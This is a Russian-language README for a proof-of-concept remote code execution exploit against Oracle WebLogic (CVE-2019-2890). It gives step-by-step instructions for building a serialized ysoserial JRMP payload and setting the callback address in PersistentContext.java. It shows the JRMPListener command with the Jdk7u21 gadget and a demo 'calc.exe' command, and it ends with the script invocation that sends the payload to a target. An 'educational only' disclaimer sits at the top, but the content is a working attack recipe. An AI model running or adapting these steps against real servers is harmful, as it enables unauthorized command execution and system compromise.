
Эксплойт PoC для CVE-2019-2890, нацеленный на Oracle WebLogic, использующий десериализацию JRMP для удаленного выполнения команд через полезные нагрузки ysoserial.
Используется только для учебных целей. За последствия другого использования ответственность несет пользователь.
Соответствующие jar-файлы уже импортированы в проект, метод эксплуатации использует JRMP от yso. При обучении и отладке можно изменить метод эксплуатации.
Сначала необходимо поместить файл SerializedSystemIni.dat из weblogic в папку security.
Затем необходимо переименовать yso в ysoserial.jar и импортировать его в каталог lib.

Затем IP-адрес и порт в методе getObject в файле weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Наконец, удаленно прослушиваем через JRMP и используем команду 7u21 для выполнения.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Инструкция по использованию: запустите Poc.java для создания сериализованного файла poc.ser, затем через
python weblogic.py ip port poc.ser

